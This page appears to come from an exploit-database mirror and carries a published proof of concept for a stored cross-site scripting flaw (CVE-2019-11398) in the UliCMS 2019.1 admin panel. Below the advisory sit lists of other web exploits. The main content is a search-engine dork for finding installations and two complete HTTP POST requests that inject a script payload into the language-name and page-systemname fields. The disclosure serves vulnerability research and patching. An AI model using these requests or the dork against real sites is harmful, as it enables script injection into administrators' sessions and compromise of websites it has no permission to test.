Search for hundreds of thousands of exploits

"UliCMS 2019.1 'Spitting Lama' - Persistent Cross-Site Scripting"

Author

Exploit author

Unk9vvN

Platform

Exploit platform

php

Release date

Exploit published date

2019-06-10

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
# Exploit Title: UliCMS 2019.1 "Spitting Lama" - Stored Cross-Site Scripting
# Google Dork: intext:"by UliCMS"
# Date: 2019-05-12
# Exploit Author: Unk9vvN
# Vendor Homepage: https://en.ulicms.de
# Software Link: https://www.ulicms.de/aktuelles.html?single=ulicms-20191-spitting-lama-ist-fertig
# Version: 2019.1
# Tested on: Kali Linux
# CVE : CVE-2019-11398


# Description
# This vulnerability is in the authentication state and is located in the CMS management panel, and the type of vulnerability is Stored and the vulnerability parameters are as follows.

# Vuln One
# URI: POST /ulicms/admin/index.php?action=languages
# Parameter: name="><script>alert('UNK9VVN')</script>

# Vuln Two
# URI: POST /ulicms/admin/index.php?action=pages_edit&page=23
# Parameter: systemname="><script>alert('UNK9VVN')</script>


#
# PoC POST (Cross Site Scripting Stored)
#
POST /ulicms/admin/index.php HTTP/1.1
Host: XXXXXXXX.ngrok.io
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://XXXXXXXX.ngrok.io/ulicms/admin/index.php?action=languages
Content-Type: application/x-www-form-urlencoded
Content-Length: 165
Cookie: 5cfc346c4b87e_SESSION=mm4j0oak7boshm2fsn5ttimip8
Connection: close
Upgrade-Insecure-Requests: 1
DNT: 1

csrf_token=c95ab2823eccb876804606aa6c60f4d9&sClass=LanguageController&sMethod=create&language_code=U9N&name=%22%3E%3Cscript%3Ealert%28%27UNK9VVN%27%29%3C%2Fscript%3E


#
# PoC POST (Cross Site Scripting Stored)
#
POST /ulicms/admin/index.php HTTP/1.1
Host: XXXXXXXX.ngrok.io
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://XXXXXXXX.ngrok.io/ulicms/admin/index.php?action=pages_edit&page=23
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 904
Cookie: 5cfc346c4b87e_SESSION=mm4j0oak7boshm2fsn5ttimip8
Connection: close
DNT: 1

csrf_token=c95ab2823eccb876804606aa6c60f4d9&sClass=PageController&sMethod=edit&edit_page=edit_page&page_id=23&systemname=%22%3E%3Cscript%3Ealert%28%27UNK9VVN%27%29%3C%2Fscript%3E&page_title=UNK9VVN&alternate_title=assdasdasd&show_headline=1&type=page&language=en&menu=top&position=0&parent=NULL&activated=1&target=_self&hidden=0&category=1&menu_image=&redirection=&link_to_language=&meta_description=&meta_keywords=&article_author_name=&article_author_email=&comment_homepage=&article_date=2019-06-09T00%3A40%3A01&excerpt=&og_title=&og_description=&og_type=&og_image=&list_type=null&list_language=&list_category=0&list_menu=&list_parent=NULL&list_order_by=title&list_order_direction=asc&limit=0&list_use_pagination=0&module=null&video=&audio=&image_url=&text_position=before&article_image=&autor=1&group_id=1&comments_enabled=null&cache_control=auto&theme=&access%5B%5D=all&custom_data=%7B%0A%0A%7D&page_content=


# Discovered by:
t.me/Unk9vvN
Release DateTitleTypePlatformAuthor
2020-06-01"QuickBox Pro 2.1.8 - Authenticated Remote Code Execution"webappsphps1gh
2020-06-01"Wordpress Plugin BBPress 2.5 - Unauthenticated Privilege Escalation"webappsphp"Raphael Karger"
2020-06-01"VMware vCenter Server 6.7 - Authentication Bypass"webappsmultiplePhotubias
2020-05-29"Crystal Shard http-protection 0.2.0 - IP Spoofing Bypass"webappsmultiple"Halis Duraki"
2020-05-29"WordPress Plugin Multi-Scheduler 1.0.0 - Cross-Site Request Forgery (Delete User)"webappsphpUnD3sc0n0c1d0
2020-05-28"Online-Exam-System 2015 - 'fid' SQL Injection"webappsphp"Berk Dusunur"
2020-05-28"EyouCMS 1.4.6 - Persistent Cross-Site Scripting"webappsphp"China Banking and Insurance Information Technology Management Co."
2020-05-28"QNAP QTS and Photo Station 6.0.3 - Remote Command Execution"webappsphpTh3GundY
2020-05-28"NOKIA VitalSuite SPM 2020 - 'UserName' SQL Injection"webappsmultiple"Berk Dusunur"
2020-05-27"LimeSurvey 4.1.11 - 'Permission Roles' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
Release DateTitleTypePlatformAuthor
2020-06-01"Wordpress Plugin BBPress 2.5 - Unauthenticated Privilege Escalation"webappsphp"Raphael Karger"
2020-06-01"QuickBox Pro 2.1.8 - Authenticated Remote Code Execution"webappsphps1gh
2020-05-29"WordPress Plugin Multi-Scheduler 1.0.0 - Cross-Site Request Forgery (Delete User)"webappsphpUnD3sc0n0c1d0
2020-05-28"QNAP QTS and Photo Station 6.0.3 - Remote Command Execution"webappsphpTh3GundY
2020-05-28"Online-Exam-System 2015 - 'fid' SQL Injection"webappsphp"Berk Dusunur"
2020-05-28"EyouCMS 1.4.6 - Persistent Cross-Site Scripting"webappsphp"China Banking and Insurance Information Technology Management Co."
2020-05-27"osTicket 1.14.1 - 'Saved Search' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
2020-05-27"Kuicms PHP EE 2.0 - Persistent Cross-Site Scripting"webappsphp"China Banking and Insurance Information Technology Management Co."
2020-05-27"OXID eShop 6.3.4 - 'sorting' SQL Injection"webappsphpVulnSpy
2020-05-27"LimeSurvey 4.1.11 - 'Permission Roles' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46977/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.